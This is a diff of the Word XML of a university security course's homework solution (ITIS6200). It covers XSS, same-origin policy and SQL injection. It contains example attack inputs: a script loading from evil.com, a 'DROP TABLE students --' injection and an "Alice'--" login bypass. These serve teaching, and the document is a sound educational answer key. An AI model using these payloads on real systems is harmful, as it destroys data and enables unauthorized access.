@@ -2956,6 +3078,7 @@
                               <w:t>fmt.Fprintf</w:t>
                             </w:r>
                             <w:proofErr w:type="spellEnd"/>
+                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3439,6 +3562,7 @@
         <w:t>src</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -3451,6 +3575,7 @@
         </w:rPr>
         <w:t>http://evil.com/hack.js</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -3594,7 +3719,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> attribute to TRUE </w:t>
+        <w:t xml:space="preserve"> attribute to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>TRUE</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3691,12 +3830,14 @@
         </w:rPr>
         <w:t>&lt;script&gt;</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
         <w:t>fetch(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -3733,13 +3874,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>&lt;/script&gt;</w:t>
+        <w:t>)&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3902,7 +4037,15 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  INT,                         -- member ID </w:t>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">INT,   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">                      -- member ID </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3921,8 +4064,13 @@
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:r>
-        <w:t>VARCHAR(255),</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>VARCHAR(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>255),</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">    -- </w:t>
@@ -4053,6 +4201,7 @@
                                 <w:color w:val="B7B7B7"/>
                               </w:rPr>
                             </w:pPr>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:eastAsia="Courier New"/>
@@ -4069,7 +4218,17 @@
                                 <w:bCs/>
                                 <w:color w:val="B7B7B7"/>
                               </w:rPr>
-                              <w:t xml:space="preserve"> := </w:t>
+                              <w:t xml:space="preserve"> :</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:eastAsia="Courier New"/>
+                                <w:b/>
+                                <w:bCs/>
+                                <w:color w:val="B7B7B7"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">= </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
                             <w:r>
@@ -4204,7 +4363,7 @@
                                 <w:bCs/>
                                 <w:color w:val="000000" w:themeColor="dark1"/>
                               </w:rPr>
-                              <w:t xml:space="preserve"> ('%s', '%s', '%s', FALSE)</w:t>
+                              <w:t xml:space="preserve"> ('%s', '%s', '%s')</w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
@@ -4332,6 +4491,7 @@
                               <w:t xml:space="preserve">    </w:t>
                             </w:r>
                             <w:proofErr w:type="spellStart"/>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4355,6 +4515,7 @@
                               <w:t>Exec</w:t>
                             </w:r>
                             <w:proofErr w:type="spellEnd"/>
+                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4392,7 +4553,11 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="40727D37" id="Google Shape;420;p50" o:spid="_x0000_s1027" type="#_x0000_t202" style="width:461.35pt;height:92.05pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight="1.5pt">
+              <v:shapetype w14:anchorId="40727D37" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Google Shape;420;p50" o:spid="_x0000_s1027" type="#_x0000_t202" style="width:461.35pt;height:92.05pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight="1.5pt">
                 <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
                 <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                   <w:txbxContent>
@@ -4569,7 +4734,7 @@
                           <w:bCs/>
                           <w:color w:val="000000" w:themeColor="dark1"/>
                         </w:rPr>
-                        <w:t xml:space="preserve"> ('%s', '%s', '%s', FALSE)</w:t>
+                        <w:t xml:space="preserve"> ('%s', '%s', '%s')</w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
@@ -4775,38 +4940,148 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">Q 5.1: Design an input that would delete the record whose </w:t>
+        <w:t xml:space="preserve">Q 5.1: Design an input that would delete the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-        <w:t>user</w:t>
+        <w:t>whole table of students</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">name </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Alice.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>First input: some student id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Second input: some username </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Third input: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">', </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>password]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">); DROP TABLE </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>students</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>

--- a/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
+++ b/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
@@ -198,15 +198,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Alice can read and write to the file x, can read the file y, and can execute the file z. Bob can read x, can </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>read</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and write </w:t>
+        <w:t xml:space="preserve">Alice can read and write to the file x, can read the file y, and can execute the file z. Bob can read x, can read and write </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1888,19 +1880,11 @@
         </w:rPr>
         <w:t xml:space="preserve"> with a </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="SimSun"/>
         </w:rPr>
-        <w:t>cookie-based</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="SimSun"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">cookie-based </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2634,16 +2618,8 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve">their origin evil or evil.bank.com doesn’t exactly match </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>bank.com</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>their origin evil or evil.bank.com doesn’t exactly match bank.com</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3719,21 +3695,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> attribute to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>TRUE</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> attribute to TRUE </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3952,12 +3914,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> points)</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4553,11 +4509,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype w14:anchorId="40727D37" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
-              <v:shape id="Google Shape;420;p50" o:spid="_x0000_s1027" type="#_x0000_t202" style="width:461.35pt;height:92.05pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight="1.5pt">
+              <v:shape w14:anchorId="40727D37" id="Google Shape;420;p50" o:spid="_x0000_s1027" type="#_x0000_t202" style="width:461.35pt;height:92.05pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight="1.5pt">
                 <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
                 <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                   <w:txbxContent>
@@ -5032,7 +4984,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">', </w:t>
+        <w:t>', [</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5040,7 +4992,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>[</w:t>
+        <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5048,7 +5000,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
+        <w:t xml:space="preserve">password]); DROP TABLE </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5056,7 +5008,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>password]</w:t>
+        <w:t>students</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5064,22 +5016,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">); DROP TABLE </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>students</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve"> --</w:t>
       </w:r>
     </w:p>
@@ -5151,17 +5087,6 @@
         </w:rPr>
         <w:t>, the application checks the credentials by performing the following SQL query:</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5185,8 +5110,10 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>SELECT * FROM users WHERE username = 'Alice' AND password = '</w:t>
-      </w:r>
+        <w:t>SELECT * FROM users WHERE username = 'Alice</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
+      <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5196,8 +5123,10 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>123456</w:t>
-      </w:r>
+        <w:t>'</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5207,13 +5136,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t xml:space="preserve"> AND password = '</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:b/>
@@ -5222,29 +5147,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t>Design an input that would bypass the password check.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t>123456</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:b/>
@@ -5253,16 +5158,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>If the query returns the details of a user, then the login is successful. Otherwise, it is rejected.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5274,17 +5180,116 @@
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Design an input that would bypass the password check.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">First input: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Alice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Second input: some </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:eastAsia="SimSun" w:hAnsi="Optima" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -7447,12 +7452,12 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00E56D3E"/>
+    <w:rsid w:val="002B1A53"/>
     <w:pPr>
       <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
     </w:rPr>
@@ -7494,6 +7499,9 @@
       <w:ind w:left="720"/>
       <w:contextualSpacing/>
     </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsia="SimSun"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="table" w:styleId="TableGrid">
     <w:name w:val="Table Grid"/>
@@ -7558,9 +7566,6 @@
     <w:pPr>
       <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
     </w:pPr>
-    <w:rPr>
-      <w:rFonts w:eastAsia="Times New Roman"/>
-    </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
     <w:name w:val="code"/>
@@ -7580,7 +7585,7 @@
     <w:unhideWhenUsed/>
     <w:rsid w:val="00BC313F"/>
     <w:rPr>
-      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+      <w:rFonts w:ascii="Consolas" w:eastAsia="SimSun" w:hAnsi="Consolas" w:cs="Consolas"/>
       <w:sz w:val="21"/>
       <w:szCs w:val="21"/>
     </w:rPr>
@@ -7637,7 +7642,7 @@
       </w:tabs>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>

--- a/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
